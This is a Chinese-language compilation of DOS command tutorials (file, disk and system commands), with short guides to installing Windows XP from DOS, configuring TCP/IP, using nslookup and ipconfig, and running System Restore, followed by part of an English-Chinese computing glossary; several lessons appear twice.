3．格式：COPY [源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]
4．使用说明：
（1）COPY是文件对文件的方式复制数据，复制前目标盘必须已经格式化；
（2）复制过程中，目标盘上相同文件名称的旧文件会被源文件取代；
（3）复制文件时，必须先确定目标般有足够的空间，否则会出现；insufficient的错误信息，提示磁盘空间不够；
（4）文件名中允许使用通配举“*”“？”，可同时复制多个文件；
（5）COPY命令中源文件名必须指出，不可以省略。
（6）复制时，目标文件名可以与源文件名相同，称作“同名拷贝”此时目标文件名可以省略；
（7）复制时，目标文件名也可以与源文件名不相同，称作“异名拷贝”，此时，目标文件名不能省略；
（8）复制时，还可以将几个文件合并为一个文件，称为“合并拷贝”，格式如下：COPY；[源盘][路径]〈源文件名1〉〈源文件名2〉…[目标盘][路径]〈目标文件名〉；
（9）利用COPY命令，还可以从键盘上输入数据建立文件，格式如下：COPY CON [盘符：][路径]〈文件名〉；
（10）注意：COPY命令的使用格式，源文件名与目标文件名之间必须有空格！
（二）XCOPY――目录复制命令
1．功能：复制指定的目录和目录下的所有文件连同目录结构。
2．类型：外部命令
3．格式：XCOPY [源盘：]〈源路径名〉[目标盘符：][目标路径名][/S][/V][/E]
4．使用说明：
（1）XCOPY是COPY的扩展，可以把指定的目录连文件和目录结构一并拷贝，但不能拷贝隐藏文件和系统文件；
（2）使用时源盘符、源目标路径名、源文件名至少指定一个；
（3）选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数，否则/S不会拷贝空目录，若不指定/S参数，则XCOPY只拷贝源目录本身的文件，而不涉及其下的子目录；
（4）选用/V参数时，对的拷贝的扇区都进行较验，但速度会降低。

DOS命令全集(第八讲)

                  （三）TYPE――显示文件内容命令
1．功能：显示ASCII码文件的内容。
2．类型：内部命令。
3．格式：TYPE[盘符：][路径]〈文件名〉
4．使用说明：
（1）显示由ASCII码组成的文本文件，对。EXE.COM等为扩展名的文件，其显示的内容是无法阅读的，没有实际意义2；
（2）该命令一次只可以显示一个文件的内容，不能使用通配符；
（3）如果文件有扩展名，则必须将扩展名写上；
（4）当文件较长，一屏显示不下时，可以按以下格式显示；TYPE[盘符：][路径]〈文件名〉|MORE，MORE为分屏显示命令，使用些参数后当满屏时会暂停，按任意键会继续显示。
（5）若需将文件内容打印出来，可用如下格式：
TYPE[盘符：][路径]〈文件名〉，＞PRN
此时，打印机应处于联机状态。
（四） REN――文件改名命令
1．功能：更改文件名称
2．类型：内部命令
3．格式：REN[盘符：][路径]〈旧文件名〉〈新文件名〉
4．使用说明：
（1）新文件名前不可以加上盘符和路径，因为该命令只能对同一盘上的文件更换文件名；
（2）允许使用通配符更改一组文件名或扩展名。
（五）FC――文件比较命令
1．功能：比较文件的异同，并列出差异处。
2．类型：外部命令
3．格式：FC[盘符：][路径名]〈文件名〉[盘符：][路径名][文件名][/A][/B][/C][/N]
4．使用说明：
（1）选用/A参数，为ASCII码比较模式；
（2）选用/B参数，为二进制比较模式；
（3）选用/C参数，将大小写字符看成是相同的字符。
（4）选用/N参数，在ASCII码比较方式下，显示相异处的行号。

DOS命令全集(第九讲)

                  （六）ATTRIB――修改文件属性命令
1．功能：修改指定文件的属性。（文件属性参见2.5.4（二）文件属性一节）
2．类型：外部命令。
3．格式：ATTRIB[文件名][R][――R][A][――A][H][――H][S][――S][/S]
4．使用说明：
（1）选用R参数，将指定文件设为只读属性，使得该文件只能读取，无法写入数据或删除；选用――R参数，去除只读属性；
（2）选用A参数，将文件设置为档案属性；选用――A参数，去除档案属性；
（3）选用H参数，将文件调协为隐含属性；选用――H参数，去隐含属性；
（4）选用S参数，将文件设置为系统属性；选用――S参数，去除系统属性；
（5）选用/S参数，对当前目录下的所有子目录及作设置。

（七） DEL――删除文件命令
1．功能：删除指定的文件。
2．类型：内部命令
3．格式：DEL[盘符：][路径]〈文件名〉[/P]
4．使用说明：
（1）选用/P参数，系统在删除前询问是否真要删除该文件，若不使用这个参数，则自动删除；
（2）该命令不能删除属性为隐含或只读的文件；
（3）在文件名称中可以使用通配符；
（4）若要删除磁盘上的所有文件（DEL*?*或DEL?），则会提示：(Arey ou sure？）（你确定吗？）若回答Y，则进行删除，回答N，则取消此次删除作业。

DOS命令全集(第十讲)

                  （八） UNDELETE――恢复删除命令
1．功能：恢复被误删除命令
2．类型：外部命令。
3．格式：UNDELETE[盘符：][路径名]〈文件名〉[/DOS]/LIST][/ALL]
4．使用说明：使用UNDELETE可以使用“*”和“？”通配符。

（1）选用/DOS参数根据目录里残留的记录来恢复文件。由于文件被删除时，目录所记载斩文件名第一个字符会被改为E5，DOS即依据文件开头的E5和其后续的字符来找到欲恢复的文件，所以，UNDELETE会要求用户输入一个字符，以便将文件名字补齐。但此字符不必和原来的一样，只需符合DOS的文件名规则即可。
（2）选用/LIST只“列出”符合指定条件的文件而不做恢复，所以对磁盘内容完全不会有影响。

（3）选用/ALL自动将可完全恢复的文件完全恢复，而不一一地询问用户，使用此参数时，若UNDELTE利用目录里残留的记录来将文件恢复，则会自动选一个字符将文件名补齐，并且使其不与现存文件名相同，选用字符的优选顺序为：#%――0000123456789A~Z。
    UNDELETE还具有建立文件的防护措施的功能，已超出本课程授课范围，请读者在使用些功能时查阅有关DOS手册。

DOS命令全集(第十一讲)

                  七、其它命令
（一）CLS――清屏幕命令
1功能：清除屏幕上的所有显示，光标置于屏幕左上角。
2类型：内部命令
3格式：CLS
（二） VER查看系统版本号命令
1功能：显示当前系统版本号
2类型：内部命令
3格式：VER
（三） DATA日期设置命令
1功能：设置或显示系统日期。
2类型：内部命令
3格式：DATE[mm――dd――yy]
4使用说明：
（1）省略[mm――dd――yy]显示系统日期并提示输入新的日期，不修改则可直接按回车键，[mm――dd――yy]为“月月――日日――年年”格式；
（2）当机器开始启动时，有自动处理文件（AUTOEXEC.BAT）被执行，则系统不提示输入系统日期。否则，提示输入新日期和时间。

DOS命令全集(第十二讲)

                  （四） TIME系统时钟设置命令
1功能：设置或显示系统时期。
2类型：内部命令
3格式：TIME[hh：mm：ss：xx]
4使用说明：
（1）省略[hh：mm：ss：xx]，显示系统时间并提示输入新的时间，不修改则可直接按回车键，[hh：mm：ss：xx]为“小时：分钟：秒：百分之几秒”格式；
（2）当机器开始启动时，有自动处理文件（AUTOEXEC.BAT）被执行，则系统不提示输入系统日期。否则，提示输入新日期和时间。
（五）MEM查看当前内存状况命令
1功能：显示当前内存使用的情况
2类型：外部命令
3格式：MEM[/C][/F][/M][/P]
4使用说明：
（1）选用/C参数列出装入常规内存和CMB的各文件的长度，同时也显示内存空间的使用状况和最大的可用空间；
（2）选用/F参数分别列出当前常规内存剩余的字节大小和UMB可用的区域及大小；
（3）选用/M参数显示该模块使用内存地地址、大小及模块性质；
（4）选用/P参数指定当输出超过一屏时，暂停供用户查看。
（六） MSD显示系统信息命令
1功能：显示系统的硬件和操作系统的状况。
2类型：外部命令
3格式：MSD[/I][/B][/S]
4使用说明：
（1）选用/I参数时，不检测硬件；
（2）选用/B参数时，以黑白方式启动MSD；
（3）选用/S参数时，显示出简明的系统报告。

DOS命令全集(第十三讲)

                  如何在DOS下安装XP
说明：DOS下安装XP不是首选，我一般是光盘启动安装的。之所以写这个是因为有很多网友想知道。
如要转贴，请注明出自闻道长安。啊啊 ：）
1.准备工作：制作98启动盘（这个不用教吧？）。 然后在WIN98的c:\windows目录里找到FORMAT.EXE和SMARTDRV.EXE两个文件，将其拷到启动盘。
2.将BIOS设为软盘启动（怎么设？我倒！）。
3.用98启动盘重起到DOS下 （注意要加载光驱启动）。

4.在命令提示符下键入：
a:\format c:/u/q　(如果你同时还想要有DOS存在的话,那么就format c:/q/u/s )　　 回车
a:\SMARTDRV.EXE　　 回车　（运行后没什么提示出现,不过已经运行了)
a:\x: （进入XP安装程序所在盘）
x:\cd i386 （进入目录）
x:\i386winnt.exe （启动安装程序）
好了，可以歇歇了――我也可以歇歇了，打字真累阿。这样安装的XP最干净。

注意：
1.x代表光盘或硬盘安装盘。有时不好使还要后挪一位，如光盘E，挪一位F。
2.前提是系统盘不是NTFS格式（不然也不叫DOS下安装了）。
3.硬盘安装，如果安装文件不在根目录下，如文件夹里，先输入x:\cd 文件夹名（不能用中文名，X为硬盘盘符）。


DOS命令全集

《一键清理系统垃圾》

DOS命令全集

一）MD——建立子目录

1．功能：创建新的子目录

2．类型：内部命令

3．格式：MD[盘符：][路径名]〈子目录名〉

4．使用说明：

（1）“盘符”：指定要建立子目录的磁盘驱动器字母，若省略，则为当前驱动器；

（2）“路径名”：要建立的子目录的上级目录名，若缺省则建在当前目录下。

例：（1）在C盘的根目录下创建名为FOX的子目录；（2）在FOX子目录下再创建USER子目录。

C：、＞MD FOX （在当前驱动器C盘下创建子目录FOX）

C：、＞MD FOX 、USER （在FOX 子目录下再创建USER子目录）

（二）CD——改变当前目录

1．功能：显示当前目录

2．类型：内部命令

3．格式：CD[盘符：][路径名][子目录名]

4．使用说明：

（1）如果省略路径和子目录名则显示当前目录；

（2）如采用“CD、”格式，则退回到根目录；

（3）如采用“CD.。”格式则退回到上一级目录。

例：（1）进入到USER子目录；（2）从USER子目录退回到子目录；（3）返回到根目录。

C:、＞CD FOX 、USER（进入FOX子目录下的USER子目录）

C:、FOX、USER＞CD.。 （退回上一级根目录）

C：、FOX＞CD、 （返回到根目录）

C：、＞

（三）RD——删除子目录命令

1．功能：从指定的磁盘删除了目录。

2．类型：内部命令

3．格式：RD[盘符：][路径名][子目录名]

4．使用说明：

（1）子目录在删除前必须是空的，也就是说需要先进入该子目录，使用DEL（删除文件的命令）将其子目录下的文件删空，然后再退回到上一级目录，用RD命令删除该了目录本身；

（2）不能删除根目录和当前目录。

例：要求把C盘FOX子目录下的USER子目录删除，操作如下：

第一步：先将USER子目录下的文件删空；

C、＞DEL C：、FOX、USER、*。*

第二步，删除USER子目录。

C、＞RD Ｃ：、FOX、USER

（四）DIR——显示磁盘目录命令

1．功能：显示磁盘目录的内容。

2．类型：内部命令

3．格式：DIR [盘符][路径][/P][/W]

4． 使用说明：/P的使用；当欲查看的目录太多，无法在一屏显示完屏幕会一直往上卷，不容易看清，加上/P参数后，屏幕上会分面一次显示23行的文件信息，然后暂停，并提示；Press any key to continue

/W的使用：加上/W只显示文件名，至于文件大小及建立的日期和时间则都省略。加上参数后，每行可以显示五个文件名。

PATH——路径设置命令

1．功能：设备可执行文件的搜索路径，只对文件有效。

2．类型：内部命令

3．格式：PATH[盘符1]目录[路径名1]{[；盘符2：]，〈目录路径名2〉…}

4．使用说明：

（1）当运行一个可执行文件时，DOS会先在当前目录中搜索该文件，若找到则运行之；若找不到该文件，则根据PATH命令所设置的路径，顺序逐条地到目录中搜索该文件；

（2）PATH命令中的路径，若有两条以上，各路径之间以一个分号“；”隔开；

（3）PATH命令有三种使用方法：

PATH[盘符1：][路径1][盘符2：][路径2]…（设定可执行文件的搜索路径）

PATH：（取消所有路径）

PATH：（显示目前所设的路径）

（六）TREE——显示磁盘目录结构命令

1．功能：显示指定驱动器上所有目录路径和这些目录下的所有文件名。

2．类型：外部命令

3．格式：TREE[盘符：][/F][》PRN]

4．使用说明：

（1）使用/F参数时显示所有目录及目录下的所有文件，省略时，只显示目录，不显示目录下的文件；

（2）选用＞PRN参数时，则把所列目录及目录中的文件名打印输出。

（七）DELTREE——删除整个目录命令

1．功能：将整个目录及其下属子目录和文件删除。

2．类型：外部命令

3．格式：DELTREE[盘符：]〈路径名〉

4．使用说明：该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除，而且不管文件的属性为隐藏、系统或只读，只要该文件位于删除的目录之下，DELTREE都一视同仁，照删不误。使用时务必小心！！！

五、磁盘操作类命令

（一）FORMAT——磁盘格式化命令

1．功能：对磁盘进行格式化，划分磁道和扇区；同时检查出整个磁盘上有无带缺陷的磁道，对坏道加注标记；建立目录区和文件分配表，使磁盘作好接收DOS的准备。

2．类型：外部命令

3．格式：FORMAT〈盘符：〉[/S][/4][/Q]

4．使用说明：

（1）命令后的盘符不可缺省，若对硬盘进行格式化，则会如下列提示：WARNING:ALL DATA ON NON ——REMOVABLE DISK

DRIVE C:WILL BE LOST ！

Proceed with Format (Y/N)？

（警告：所有数据在C盘上，将会丢失，确实要继续格式化吗？）

（2）若是对软盘进行格式化，则会如下提示：Insert mew diskette for drive A;

and press ENTER when ready…

（在A驱中插入新盘，准备好后按回车键）。

（3）选用[/S]参数，将把DOS系统文件IO.SYS 、MSDOS.SYS及COMMAND.COM复制到磁盘上，使该磁盘可以做为DOS启动盘。若不选用/S参数，则格式化后的磙盘只能读写信息，而不能做为启动盘；

（4）选用[/4]参数，在1.2MB的高密度软驱中格式化360KB的低密度盘；

（5）选用[/Q]参数，快速格式化，这个参数并不会重新划分磁盘的磁道貌岸然和扇区，只能将磁盘根目录、文件分配表以及引导扇区清成空白，因此，格式化的速度较快。

（6）选用[/U]参数，表示无条件格式化，即破坏原来磁盘上所有数据。不加/U，则为安全格式化，这时先建立一个镜象文件保存原来的FAT表和根目录，必要时可用UNFORRMAT恢复原来的数据。

（二）UNFORMAT恢复格式化命令

1．功能：对进行过格式化误操作丢失数据的磁盘进行恢复。

2．类型：外部命令

3．格式：UNFORMAT〈盘符〉[/L][/U][/P][/TEST]

4．使用说明：用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区（包括FAT、根目录、BOOT扇区及硬盘分区表）受损时，也可以用UNFORMAT来抢救。

（1）选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息，但不会真的做FORMAT工作。

（2）选用/P参数将显示于屏幕的报告（包含/L参数所产生的信息）同时也送到打印机。运行时屏幕会显示：“Print out will be sent to LPT1”

（3）选用/TEST参数只做模拟试验（TEST）不做真正的写入动作。使用此参数屏幕会显示：“Simulation only”

（4）选用/U参数不使用MIRROR映像文件的数据，直接根据磁盘现状进行UNFORMAT。

（5）选用/PSRTN；修复硬盘分区表。

若在盘符之后加上/P、/L、/TEST之一，都相当于使用了/U参数，UNFORMAT会“假设”此时磁盘没有MIRROR映像文件。

注意：UNFORMAT对于刚FORMAT的磁盘，可以完全恢复，但FORMAT后若做了其它数据的写入，则UNFORMAT就不能完整的救回数据了。UNFORMAT并非是万能的，由于使用UNFORMAT会重建FAT与根目录，所以它也具有较高的危险性，操作不当可能会扩大损失，如果仅误删了几个文件或子目录，只需要利用UNDELETE就够了。
三） CHKDSK——检查磁盘当前状态命令

1．功能：显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。

2．类型：外部命令

3．格式：CHKDSK [盘符：][路径][文件名][/F][/V]

4．使用说明：

（1）选用[文件名]参数，则显示该文件占用磁盘的情况；

（2）选[/F]参数，纠正在指定磁盘上发现的逻辑错误；

（3）选用[/V]参数，显示盘上的所有文件和路径。

（四）DISKCOPY——整盘复制命令

1．功能：复制格式和内容完全相同的软盘。

2．类型：外部命令

3．格式：DISKCOPY[盘符1：][盘符2：]

4．使用说明：

（1）如果目标软盘没有格式化，则复制时系统自动选进行格式化。

（2）如果目标软盘上原有文件，则复制后将全部丢失。

（3）如果是单驱动器复制，系统会提示适时更换源盘和目标盘，请操作时注意分清源盘和目标盘。

（五）LABEL——建立磁盘卷标命令

1．功能：建立、更改、删除磁盘卷标。

2．类型：外部命令

3．格式：LABEL[盘符：][卷标名]

4．使用说明：

（1）卷标名为要建立的卷标名，若缺省此参数，则系统提示键入卷标名或询问是否删除原有的卷标名；

（2）卷标名由1至11个字符组成。

（六）VOL——显示磁盘卷标命令

1．功能：查看磁盘卷标号。

2．类型：内部命令

3．格式：VOL[盘符：]

4．使用说明：省略盘符，显示当前驱动器卷标。

（七）SCANDISK——检测、修复磁盘命令

1．功能：检测磁盘的FAT表、目录结构、文件系统等是否有问题，并可将检测出的问题加以修复。

2．类型：外部命令

3．格式：SCANDISK[盘符1：]{[盘符2：]…}[/ALL]

4．使用说明：

（1）CCANDISK适用于硬盘和软盘，可以一次指定多个磁盘或选用[/ALL]参数指定所有的磁盘；

（2）可自动检测出磁盘中所发生的交叉连接、丢失簇和目录结构等逻辑上的错误，并加以修复。

（八）DEFRAG——重整磁盘命令

1．。功能：整理磁盘，消除磁盘碎块。

2．类型：外部命令

3．格式：DEFRAG[盘符：][/F]

4．使用说明：选用/F参数，将文件中存在盘上的碎片消除，并调整磁盘文件的安排，确保文件之间毫无空隙。从而加快读盘速度和节省磁盘空间。

（九）SYS——系统复制命令

1．功能：将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM 传送到指定的驱动器上。

2．类型：外部命令

3．格式：SYS[盘符：]

*使用说明：如果磁盘剩余空间不足以存放系统文件，则提示：No roomfor on destination disk.

文件操作类命令

（一） COPY文件复制命令

1．功能：拷贝一个或多个文件到指定盘上。

2．类型：内部命令

3．格式：COPY [源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]

4．使用说明：

（1）COPY是文件对文件的方式复制数据，复制前目标盘必须已经格式化；

（2）复制过程中，目标盘上相同文件名称的旧文件会被源文件取代；

（3）复制文件时，必须先确定目标般有足够的空间，否则会出现；insufficient的错误信息，提示磁盘空间不够；

（4）文件名中允许使用通配举“*”“？”，可同时复制多个文件；

（5）COPY命令中源文件名必须指出，不可以省略。

（6）复制时，目标文件名可以与源文件名相同，称作“同名拷贝”此时目标文件名可以省略；

（7）复制时，目标文件名也可以与源文件名不相同，称作“异名拷贝”，此时，目标文件名不能省略；

（8）复制时，还可以将几个文件合并为一个文件，称为“合并拷贝”，格式如下：COPY；[源盘][路径]〈源文件名1〉〈源文件名2〉…[目标盘][路径]〈目标文件名〉；

（9）利用COPY命令，还可以从键盘上输入数据建立文件，格式如下：COPY CON [盘符：][路径]〈文件名〉；

（10）注意：COPY命令的使用格式，源文件名与目标文件名之间必须有空格！

（二）XCOPY——目录复制命令

1．功能：复制指定的目录和目录下的所有文件连同目录结构。

2．类型：外部命令

3．格式：XCOPY [源盘：]〈源路径名〉[目标盘符：][目标路径名][/S][/V][/E]

4．使用说明：

（1）XCOPY是COPY的扩展，可以把指定的目录连文件和目录结构一并拷贝，但不能拷贝隐藏文件和系统文件；

（2）使用时源盘符、源目标路径名、源文件名至少指定一个；

（3）选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数，否则/S不会拷贝空目录，若不指定/S参数，则XCOPY只拷贝源目录本身的文件，而不涉及其下的子目录；

（4）选用/V参数时，对的拷贝的扇区都进行较验，但速度会降低。

（三）TYPE——显示文件内容命令

1．功能：显示ASCII码文件的内容。

2．类型：内部命令。

3．格式：TYPE[盘符：][路径]〈文件名〉

4．使用说明：

（1）显示由ASCII码组成的文本文件，对。EXE.COM等为扩展名的文件，其显示的内容是无法阅读的，没有实际意义2；

（2）该命令一次只可以显示一个文件的内容，不能使用通配符；

（3）如果文件有扩展名，则必须将扩展名写上；

（4）当文件较长，一屏显示不下时，可以按以下格式显示；TYPE[盘符：][路径]〈文件名〉|MORE，MORE为分屏显示命令，使用些参数后当满屏时会暂停，按任意键会继续显示。

（5）若需将文件内容打印出来，可用如下格式：

TYPE[盘符：][路径]〈文件名〉，＞PRN

此时，打印机应处于联机状态。

（四） REN——文件改名命令

1．功能：更改文件名称

2．类型：内部命令

3．格式：REN[盘符：][路径]〈旧文件名〉〈新文件名〉

4．使用说明：

（1）新文件名前不可以加上盘符和路径，因为该命令只能对同一盘上的文件更换文件名；

（2）允许使用通配符更改一组文件名或扩展名。

（五）FC——文件比较命令

1．功能：比较文件的异同，并列出差异处。

2．类型：外部命令

3．格式：FC[盘符：][路径名]〈文件名〉[盘符：][路径名][文件名][/A][/B][/C][/N]

4．使用说明：

（1）选用/A参数，为ASCII码比较模式；

（2）选用/B参数，为二进制比较模式；

（3）选用/C参数，将大小写字符看成是相同的字符。

（4）选用/N参数，在ASCII码比较方式下，显示相异处的行号。

（六）ATTRIB——修改文件属性命令

1．功能：修改指定文件的属性。（文件属性参见2.5.4（二）文件属性一节）

2．类型：外部命令。

3．格式：ATTRIB[文件名][R][——R][A][——A][H][——H][S][——S][/S]

4．使用说明：

（1）选用R参数，将指定文件设为只读属性，使得该文件只能读取，无法写入数据或删除；选用——R参数，去除只读属性；

（2）选用A参数，将文件设置为档案属性；选用——A参数，去除档案属性；

（3）选用H参数，将文件调协为隐含属性；选用——H参数，去隐含属性；

（4）选用S参数，将文件设置为系统属性；选用——S参数，去除系统属性；

（5）选用/S参数，对当前目录下的所有子目录及作设置。

七） DEL——删除文件命令

1．功能：删除指定的文件。

2．类型：内部命令

3．格式：DEL[盘符：][路径]〈文件名〉[/P]

4．使用说明：

（1）选用/P参数，系统在删除前询问是否真要删除该文件，若不使用这个参数，则自动删除；

（2）该命令不能删除属性为隐含或只读的文件；

（3）在文件名称中可以使用通配符；

（4）若要删除磁盘上的所有文件（DEL*·*或DEL·），则会提示：(Arey ou sure？）（你确定吗？）若回答Y，则进行删除，回答N，则取消此次删除作业。

（八） UNDELETE——恢复删除命令

1．功能：恢复被误删除命令

2．类型：外部命令。

3．格式：UNDELETE[盘符：][路径名]〈文件名〉[/DOS]/LIST][/ALL]

4．使用说明：使用UNDELETE可以使用“*”和“？”通配符。

（1）选用/DOS参数根据目录里残留的记录来恢复文件。由于文件被删除时，目录所记载斩文件名第一个字符会被改为E5，DOS即依据文件开头的E5和其后续的字符来找到欲恢复的文件，所以，UNDELETE会要求用户输入一个字符，以便将文件名字补齐。但此字符不必和原来的一样，只需符合DOS的文件名规则即可。

（2）选用/LIST只“列出”符合指定条件的文件而不做恢复，所以对磁盘内容完全不会有影响。

（3）选用/ALL自动将可完全恢复的文件完全恢复，而不一一地询问用户，使用此参数时，若UNDELTE利用目录里残留的记录来将文件恢复，则会自动选一个字符将文件名补齐，并且使其不与现存文件名相同，选用字符的优选顺序为：#%——0000123456789A~Z。

UNDELETE还具有建立文件的防护措施的功能，已超出本课程授课范围，请读者在使用些功能时查阅有关DOS手册。

七、其它命令

（一）CLS——清屏幕命令

1功能：清除屏幕上的所有显示，光标置于屏幕左上角。

2类型：内部命令

3格式：CLS

（二） VER查看系统版本号命令

1功能：显示当前系统版本号

2类型：内部命令

3格式：VER

（三） DATA日期设置命令

1功能：设置或显示系统日期。

2类型：内部命令

3格式：DATE[mm——dd——yy]

4使用说明：

（1）省略[mm——dd——yy]显示系统日期并提示输入新的日期，不修改则可直接按回车键，[mm——dd——yy]为“月月——日日——年年”格式；

（2）当机器开始启动时，有自动处理文件（AUTOEXEC.BAT）被执行，则系统不提示输入系统日期。否则，提示输入新日期和时间。

（四） TIME系统时钟设置命令

1功能：设置或显示系统时期。

2类型：内部命令

3格式：TIME[hh：mm：ss：xx]

4使用说明：

（1）省略[hh：mm：ss：xx]，显示系统时间并提示输入新的时间，不修改则可直接按回车键，[hh：mm：ss：xx]为“小时：分钟：秒：百分之几秒”格式；

（2）当机器开始启动时，有自动处理文件（AUTOEXEC.BAT）被执行，则系统不提示输入系统日期。否则，提示输入新日期和时间。

（五）MEM查看当前内存状况命令

1功能：显示当前内存使用的情况

2类型：外部命令

3格式：MEM[/C][/F][/M][/P]

4使用说明：

（1）选用/C参数列出装入常规内存和CMB的各文件的长度，同时也显示内存空间的使用状况和最大的可用空间；

（2）选用/F参数分别列出当前常规内存剩余的字节大小和UMB可用的区域及大小；

（3）选用/M参数显示该模块使用内存地地址、大小及模块性质；

（4）选用/P参数指定当输出超过一屏时，暂停供用户查看。

（六） MSD显示系统信息命令

1功能：显示系统的硬件和操作系统的状况。

2类型：外部命令

3格式：MSD[/I][/B][/S]

4使用说明：

（1）选用/I参数时，不检测硬件；

（2）选用/B参数时，以黑白方式启动MSD；

（3）选用/S参数时，显示出简明的系统报告。


DOS如何安装tcp/ip协议，用来运行FTP,TELNET等

《一键清理系统垃圾》

DOS如何安装tcp/ip协议，用来运行FTP,TELNET等

有安装盘，运行setup.exe or install.bat
文件解压缩后，在硬盘上生成一个目录，如 C:\tcpip
运行FTP，TELNET必须首先运行网卡的驱动程序，然后
就可以了。例如NE2000的网卡：
C:\TCPIP>type tcp.bat

C:\TCPIP\NE2000 0x62 0x03 0x300
C:\TCPIP\TCPSTART

然后，运行telnet 或 ftp 都可以咯。


在DOS下安装Win XP

《一键清理系统垃圾》

在DOS下安装Win XP

    在Win 98的DOS状态下可以安装Win XP，插入Win XP光盘后，首先从开始中进入MS-DOS，然后在MS-DOS下输入“G:\Setup.exe”(G为光驱盘符)即可。

    如果想从纯DOS下进行安装，可用启动盘启动到DOS状态，安装时首先加载Smartdrv.exe(将Win 98安装光盘或Win 98系统的Windows目录中的Smartdrv.exe拷贝到启动盘上，在DOS提示符下执行Smartdrv.exe即可加载)，然后运行/i386目录下的winnt.exe即可。


DOS下一些命令在网络环境中的应用

《一键清理系统垃圾》

DOS下一些命令在网络环境中的应用

    经常上网的朋友对Ping这条命令一定是驾轻就熟，通过运行Ping一个IP地址的命令来检测电脑连接该主机的速度和可靠性，或者直接Ping一个域名来解析得到该域名所指向的IP地址。此外，Telnet这条命令可以用来与远程主机的连接，实现上传下载，或登录BBS。这些都是简单的DOS命令在网络中的应用。由于这些命令都是Windows系统本身自带的，应用起来很方便。上述两条命令大家用得最多，下面将其他的一些DOS命令作一个简要介绍：

1.利用Nslookup命令查看对方主机的IP地址和主机名称

    这个命令在查看主机IP的时候跟Ping命令有些相似，但得到的信息却有些不同。除了得到对方主机IP之外，还可以得到域名解析服务器的主机名称和对应的IP地址。例如在DOS状态下运行Nslookup www.xjtu.edu.cn，将得到下列信息：

Server: dec3000.xjtu.edu.cn

Address: 202.117.0.20

Name: xjtu04.xjtu.edu.cn

Address: 202.117.1.13

Aliases: www.xjtu.edu.cn

2.运行Ipconfig命令来查看电脑上网络的详细配置

    在Windows控制面板上的网络选项处，只能看到网络配置上的一些基本配置信息，如安装了哪些网络协议，本机的IP地址（如果是固定IP的话），网络邻居上的工作组名称等。但如果要具体查看其他的信息，如查看网卡的物理地址就可以运行网络配置的命令Winipcfg。此外，在MS-DOS方式下运行IPCONFIG /ALL这条命令，就会看到所有网络配置的基本信息，如主机名称，DNS解析服务器地址等，

如下所示：

Host Name . . . . . . . . . : wangwei.sei.xjtu.edu.cn

DNS Servers . . . . . . . . : 202.117.0.20

NetBIOS Resolution Uses DNS : Yes

Description . . . . . . . . : Novell 2000 Adapter.

Physical Address. . . . .: 00-88-CC-06-01-FB

IP Address. . . . . . . . . : 192.168.1.210

Subnet Mask . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . : 192.168.1.1

Primary WINS Server . . . . : 192.168.1.2


在DOS中使用系统还原工具

《一键清理系统垃圾》

在DOS中使用系统还原工具

    在系统上电自检声响后，Windows欢迎屏幕出现之前按下F8键，接着在菜单中选择Safe Mode with Command Prompt，然后使用管理员身份登录，在命令行提示符后输入：%systemroot%\ system32\restore\rstrui.exe，回车后跟随屏幕上的向导将系统恢复到以前的正常状态。


MS-DOS信息英汉对照 计算机英语强化

《一键清理系统垃圾》

MS-DOS信息英汉对照 计算机英语强化

词汇 释义
abort 中止
abstract class 抽象类
accelerator 快捷键
accelerator mapping 快捷键映射
accelerator table 快捷键对应表
access modifier 访问修饰符
Access Pack 访问包
access specifier 访问说明符
access violation 访问冲突
accessibility 辅助功能
accessibility domain 可访问域
Accessibility Options 辅助功能选项
accessor 访问器
action 操作
Active Directory hierarchy Active Directory 层次结构
active document 活动文档
Active Document Containment 活动文档包容
active end 活动端
active object 活动对象
active point 活动点
Active Template Library 活动模板库
ActiveX Component ActiveX 组件
ActiveX Control ActiveX 控件
ActiveX control container ActiveX 控件容器
ActiveX Control Interface Wizard ActiveX 控件接口向导
ActiveX Control Test Container ActiveX 控件测试容器
ActiveX Designer ActiveX 设计器
ActiveX Document Migration Wizard ActiveX 文档移植向导
ActiveX-enabled 支持 ActiveX 的
Add key/ Multiply key/ Substract key/ Devide key 加号键/ 乘号键/ 减号键/ 除号键
Add-In 外接程序
Address Book 通讯簿
address space 地址空间
Administrator Mode 管理员模式
advise sink 通知接收
aggregate 聚合
Airbrush 喷枪
All Tables 所有表
allocation hook 分配挂钩
Alternate text "替换文字,备用文本"
Always On Top 总在最前面
ambient 环境
ambiguous 不明确
ampersand 符号
ampersand (&) “and”符 (&)
anchor 标记
animation control 动画控件
apartment-model threading 单元模型线程
application framework 应用程序框架
Application Wizard 应用程序向导
Apply Now 立即应用
apply to similar 应用到相似项
argument 字变量
Arrange Tables 排列表
array initializer 数组初始值设定项
array rank 数组秩
arrow cap 箭头帽
ARROW key 箭头键
ArrowHourGlass 箭头沙漏
ArrowQuestion 箭头问号
article family 文章族
assembly 程序集；汇编
assembly manifest 程序集清单
assert 断言
assign 分配
associate 关联
"asterisk (""*"")" 星号（“*”）
asynchronous moniker 异步名字对象
asynchronous peek operation 异步查看操作
ATL Object Wizard ATL 对象向导
atomic operation 原子操作
attached table 附加表
attribute 特性
Attributed Component Wizard 属性化组件向导
Attributed Programming 属性化编程
Attributes Property Attributes 属性
Authentication 身份验证
authorable 可创作（的）
Auto completion for commands 自动完成命令
Auto Increment 自动增加
Auto Syntax Check 自动语法校验
Automatic 自动
automation 自动控制
automation-enabled 启用自动化
background color 背景色
backslash 反斜杠
bad 坏的
base address 基址
base class 基类
base implementation 基实现
base keyword 基关键字
base method 基方法
base table 基表
be paged to disk 分页到磁盘
behavior 行为
Behind the Scenes 幕后
Bezier 贝塞尔曲线
Binary Binary；二进制
binary operator 二元运算符
bind 绑定
binder 联编程序
binding constraints 绑定约束
bit field 位域
bitmask 位掩码
bitwise 按位
bitwise complement operator 按位求补运算符
bit-wise equivalent 位等效数
bitwise OR operator 位 OR 运算符
block 块
block if If 块
blocking UI 模块化用户界面
body 正文
Book Edition 试用版
bookmark 书签文件
Boolean 布尔
bottom margin 下边距
bound 上下限
bound control 绑定控件
